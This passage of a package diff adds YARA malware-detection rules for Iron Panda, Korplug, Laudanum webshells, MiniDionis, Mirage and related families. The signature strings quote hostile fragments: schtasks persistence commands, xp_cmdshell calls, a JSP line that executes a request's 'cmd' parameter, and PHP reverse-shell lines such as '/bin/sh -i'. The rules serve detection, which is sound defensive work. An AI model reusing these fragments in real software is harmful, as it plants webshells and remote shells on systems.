+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		score = 80
+		hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
+	strings:
+		$s1 = "dnstunclient -d or -domain <domain>" fullword ascii
+		$s2 = "dnstunclient -ip <server ip address>" fullword ascii
+		$s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
+		$s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
+		$s5 = "taskkill /im conime.exe" fullword ascii
+		$s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" fullword ascii
+		$s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
+		$s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
+		$s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
+		$s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
+		$s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 400KB and 2 of them ) 
+		or
+		5 of them
+}
+
+rule IronPanda_Malware1 {
+	meta:
+		description = "Iron Panda Malware"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
+	strings:
+		$x1 = "activedsimp.dll" fullword wide
+		$s1 = "get_BadLoginAddress" fullword ascii
+		$s2 = "get_LastFailedLogin" fullword ascii
+		$s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
+		$s4 = "get_PasswordExpirationDate" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule IronPanda_Webshell_JSP {
+	meta:
+		description = "Iron Panda Malware JSP"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
+	strings:
+		$s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
+		$s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
+		$s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
+	condition:
+		filesize < 330KB and 1 of them
+}
+
+rule IronPanda_Malware_Htran {
+	meta:
+		description = "Iron Panda Malware Htran"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
+	strings:
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s4 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s5 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s6 = "[+] Make a Connection to %s:%d...." fullword ascii
+		$s7 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s10 = "cmshared_get_ptr_from_atom" fullword ascii
+		$s11 = "_cmshared_get_ptr_from_atom" fullword ascii
+		$s12 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s13 = "[-] TransmitPort invalid." fullword ascii
+		$s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
+	condition:
+		 ( uint16(0) == 0x5a4d and filesize < 125KB and 3 of them ) 
+		 or 
+		 5 of them
+}
+
+rule IronPanda_Malware2 {
+	meta:
+		description = "Iron Panda Malware"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
+	strings:
+		$s0 = "\\setup.exe" fullword ascii
+		$s1 = "msi.dll.urlUT" fullword ascii
+		$s2 = "msi.dllUT" fullword ascii
+		$s3 = "setup.exeUT" fullword ascii
+		$s4 = "/c del /q %s" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 180KB and all of them
+}
+
+rule IronPanda_Malware3 {
+	meta:
+		description = "Iron Panda Malware"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
+	strings:
+		$s0 = "PluginDeflater.exe" fullword wide
+		$s1 = ".Deflated" fullword wide
+		$s2 = "PluginDeflater" fullword ascii
+		$s3 = "DeflateStream" fullword ascii /* Goodware String - occured 1 times */
+		$s4 = "CompressionMode" fullword ascii /* Goodware String - occured 4 times */
+		$s5 = "System.IO.Compression" fullword ascii /* Goodware String - occured 6 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 10KB and all of them
+}
+
+rule IronPanda_Malware4 {
+	meta:
+		description = "Iron Panda Malware"
+		author = "Florian Roth"
+		reference = "https://goo.gl/E4qia9"
+		date = "2015-09-16"
+		hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
+	strings:
+		$s0 = "TestPlugin.dll" fullword wide
+		$s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
+		$s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
+		$s6 = "TestPlugin" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 10KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Kaba.yar remnux-rules-0.0.4/yara/malware/APT_Kaba.yar
--- remnux-rules-0.0.3/yara/malware/APT_Kaba.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Kaba.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule rtf_Kaba_jDoe
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.Kaba"
+	filetype = "RTF"
+	version = "0.1"
+	description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
+	date = "2013-12-10"
+strings:
+  	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+  	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+  	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+  	$author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
+  	$author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
+	$string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
+condition:
+  	($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
+} 
diff -Nru remnux-rules-0.0.3/yara/malware/APT_korplug_fast.yar remnux-rules-0.0.4/yara/malware/APT_korplug_fast.yar
--- remnux-rules-0.0.3/yara/malware/APT_korplug_fast.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_korplug_fast.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Korplug_FAST {
+    meta:
+        description = "Rule to detect Korplug/PlugX FAST variant"
+        author = "Florian Roth"
+        date = "2015-08-20"
+        hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
+    strings:
+        $x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
+
+        $a1 = "ShadowPlay" fullword ascii
+
+        $s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
+        $s2 = "nvdisps.dll" fullword ascii
+        $s3 = "%snvdisps.dll" fullword ascii
+        $s4 = "\\winhlp32.exe" fullword ascii
+        $s5 = "nvdisps_user.dat" fullword ascii
+        $s6 = "%snvdisps_user.dat" fullword ascii
+    condition:
+        uint16(0) == 0x5a4d and filesize < 500KB and 
+        (
+            $x1 or
+            ($a1 and 1 of ($s*)) or 
+            4 of ($s*)
+        )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Laudanum_Webshells.yar remnux-rules-0.0.4/yara/malware/APT_Laudanum_Webshells.yar
--- remnux-rules-0.0.3/yara/malware/APT_Laudanum_Webshells.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Laudanum_Webshells.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,306 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule asp_file {
+	meta:
+		description = "Laudanum Injector Tools - file file.asp"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
+	strings:
+		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
+		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
+		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii /* PEStudio Blacklist: strings */
+		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
+		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
+	condition:
+		uint16(0) == 0x253c and filesize < 30KB and 5 of them
+}
+
+rule php_killnc {
+	meta:
+		description = "Laudanum Injector Tools - file killnc.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+	strings:
+		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
+		$s3 = "<?php echo exec('killall nc');?>" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii /* PEStudio Blacklist: strings */
+		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
+	condition:
+		filesize < 15KB and 4 of them
+}
+
+rule asp_shell {
+	meta:
+		description = "Laudanum Injector Tools - file shell.asp"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
+	strings:
+		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "%ComSpec% /c dir" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "Server.ScriptTimeout = 180" fullword ascii /* PEStudio Blacklist: strings */
+		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii /* PEStudio Blacklist: strings */
+		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
+		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 15KB and 4 of them
+}
+
+rule settings {
+	meta:
+		description = "Laudanum Injector Tools - file settings.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+	strings:
+		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "<li>Reverse Shell - " fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 13KB and all of them
+}
+
+rule asp_proxy {
+	meta:
+		description = "Laudanum Injector Tools - file proxy.asp"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
+	strings:
+		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
+		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii /* PEStudio Blacklist: strings */
+		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii /* PEStudio Blacklist: strings */
+		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 50KB and all of them
+}
+
+rule cfm_shell {
+	meta:
+		description = "Laudanum Injector Tools - file shell.cfm"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "885e1783b07c73e7d47d3283be303c9719419b92"
+	strings:
+		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
+	condition:
+		filesize < 20KB and 2 of them
+}
+
+rule aspx_shell {
+	meta:
+		description = "Laudanum Injector Tools - file shell.aspx"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+	strings:
+		$s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii /* PEStudio Blacklist: strings */
+		$s2 = "remoteIp = Request.UserHostAddress;" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "<form method=\"post\" name=\"shell\">" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 20KB and all of them
+}
+
+rule php_shell {
+	meta:
+		description = "Laudanum Injector Tools - file shell.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+	strings:
+		$s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 40KB and all of them
+}
+
+rule php_reverse_shell {
+	meta:
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
+	strings:
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 15KB and all of them
+}
+
+rule php_dns {
+	meta:
+		description = "Laudanum Injector Tools - file dns.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+	strings:
+		$s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "foreach (array_keys($types) as $t) {" fullword ascii
+	condition:
+		filesize < 15KB and all of them
+}
+
+rule WEB_INF_web {
+	meta:
+		description = "Laudanum Injector Tools - file web.xml"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "0251baed0a16c451f9d67dddce04a45dc26cb4a3"
+	strings:
+		$s1 = "<servlet-name>Command</servlet-name>" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
+	condition:
+		filesize < 1KB and all of them
+}
+
+rule jsp_cmd {
+	meta:
+		description = "Laudanum Injector Tools - file cmd.war"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
+	strings:
+		$s0 = "cmd.jsp}" fullword ascii
+		$s1 = "cmd.jspPK" fullword ascii
+		$s2 = "WEB-INF/web.xml" fullword ascii /* Goodware String - occured 1 times */
+		$s3 = "WEB-INF/web.xmlPK" fullword ascii /* Goodware String - occured 1 times */
+		$s4 = "META-INF/MANIFEST.MF" fullword ascii /* Goodware String - occured 12 times */
+	condition:
+		uint16(0) == 0x4b50 and filesize < 2KB and all of them
+}
+
+rule laudanum {
+	meta:
+		description = "Laudanum Injector Tools - file laudanum.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+	strings:
+		$s1 = "public function __activate()" fullword ascii
+		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 5KB and all of them
+}
+
+rule php_file {
+	meta:
+		description = "Laudanum Injector Tools - file file.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+	strings:
+		$s1 = "$allowedIPs =" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
+		$s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
+	condition:
+		filesize < 10KB and all of them
+}
+
+rule warfiles_cmd {
+	meta:
+		description = "Laudanum Injector Tools - file cmd.jsp"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
+	strings:
+		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
+		$s4 = "String disr = dis.readLine();" fullword ascii
+	condition:
+		filesize < 2KB and all of them
+}
+
+rule asp_dns {
+	meta:
+		description = "Laudanum Injector Tools - file dns.asp"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "5532154dd67800d33dace01103e9b2c4f3d01d51"
+	strings:
+		$s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "Response.Write command & \"<br>\"" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 21KB and all of them
+}
+
+rule php_reverse_shell_2 {
+	meta:
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		hash = "025db3c3473413064f0606d93d155c7eb5049c42"
+	strings:
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii /* PEStudio Blacklist: strings */
+		$s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		filesize < 10KB and all of them
+}
+
+rule Laudanum_Tools_Generic {
+	meta:
+		description = "Laudanum Injector Tools"
+		author = "Florian Roth"
+		reference = "http://laudanum.inguardians.com/"
+		date = "2015-06-22"
+		super_rule = 1
+		hash0 = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+		hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
+		hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+		hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+		hash4 = "f49291aef9165ee4904d2d8c3cf5a6515ca0794f"
+		hash5 = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+		hash6 = "f32b9c2cc3a61fa326e9caebce28ef94a7a00c9a"
+		hash7 = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+		hash8 = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+		hash9 = "b50ae35fcf767466f6ca25984cc008b7629676b8"
+		hash10 = "5570d10244d90ef53b74e2ac287fc657e38200f0"
+		hash11 = "42bcb491a11b4703c125daf1747cf2a40a1b36f3"
+		hash12 = "83e4eaaa2cf6898d7f83ab80158b64b1d48096f4"
+		hash13 = "dec7ea322898690a7f91db9377f035ad7072b8d7"
+		hash14 = "a2272b8a4221c6cc373915f0cc555fe55d65ac4d"
+		hash15 = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+		hash16 = "43320dc23fb2ed26b882512e7c0bfdc64e2c1849"
+	strings:
+		$s1 = "***  laudanum@secureideas.net" fullword ascii
+		$s2 = "*** Laudanum Project" fullword ascii
+	condition:
+		filesize < 60KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_LotusBlossom.yar remnux-rules-0.0.4/yara/malware/APT_LotusBlossom.yar
--- remnux-rules-0.0.3/yara/malware/APT_LotusBlossom.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_LotusBlossom.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+rule EliseLotusBlossom
+{
+meta:
+	author = "Jose Ramon Palanco"
+	date = "2015-06-23"
+	description = "Elise Backdoor Trojan"
+	ref = "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html"
+
+strings:
+        $magic = { 4d 5a }
+	$s1 = "\",Update" wide
+	$s2 = "LoaderDLL.dll"
+	$s3 = "Kernel32.dll"
+	$s4 = "{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}"
+	$s5 = "\\Network\\" wide
+	$s6 = "0SSSSS"
+	$s7 = "441202100205"
+	$s8 = "0WWWWW"
+condition:
+	$magic at 0 and all of ($s*)	
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Minidionis.yar remnux-rules-0.0.4/yara/malware/APT_Minidionis.yar
--- remnux-rules-0.0.3/yara/malware/APT_Minidionis.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Minidionis.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,76 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule MiniDionis_readerView {
+	meta:
+		description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+		author = "Florian Roth"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		date = "2015-07-20"
+		/* Original Hash */
+		hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		/* Derived Samples */
+		hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+	strings:
+		$s1 = "%ws_out%ws" fullword wide /* score: '8.00' */
+		$s2 = "dnlibsh" fullword ascii /* score: '7.00' */
+
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and all of ($s*) and 1 of ($op*)
+}
+
+/* Related - SFX files or packed files with typical malware content -------- */
+
+rule Malicious_SFX1 {
+	meta:
+		description = "SFX with voicemail content"
+		author = "Florian Roth"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		date = "2015-07-20"
+		hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
+	strings:
+		$s0 = "voicemail" ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
+		$s1 = ".exe" ascii
+	condition:
+		uint16(0) == 0x4b50 and filesize < 1000KB and $s0 in (3..80) and $s1 in (3..80) 
+}
+
+rule Malicious_SFX2 {
+	meta:
+		description = "SFX with adobe.exe content"
+		author = "Florian Roth"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		date = "2015-07-20"
+		hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
+	strings:
+		$s1 = "adobe.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
+		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide /* PEStudio Blacklist: strings */ /* score: '26.00' */
+		$s3 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */ /* score: '23.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule MiniDionis_VBS_Dropped {
+	meta:
+		description = "Dropped File - 1.vbs"
+		author = "Florian Roth"
+		reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
+		date = "2015-07-21"
+		hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
+	strings:
+		$s1 = "Wscript.Sleep 5000" ascii
+		$s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
+		$s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
+		$s4 = "If(FSO.FileExists(\"" ascii
+		$s5 = "then FSO.DeleteFile(\".\\" ascii
+	condition:
+		filesize < 1KB and all of them and $s1 in (0..40)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Mirage.yar remnux-rules-0.0.4/yara/malware/APT_Mirage.yar
--- remnux-rules-0.0.3/yara/malware/APT_Mirage.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Mirage.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MirageStrings : Mirage Family
+{
+    meta:
+        description = "Mirage Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "Neo,welcome to the desert of real." wide ascii
+        $ = "/result?hl=en&id=%s"
+        
+    condition:
+       any of them
+}
+
+rule Mirage : Family
+{
+    meta:
+        description = "Mirage"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        MirageStrings
+}
+
+rule Mirage_APT : APT Backdoor Rat
+{
+    meta:
+        Author      = "Silas Cutler"
+        Date        = "yyyy/mm/dd"
+        Description = "Malware related to APT campaign"
+        Reference   = "Useful link"
+    
+    strings:
+        $a1 = "welcome to the desert of the real"
+        $a2 = "Mirage"
+        $b = "Encoding: gzip"
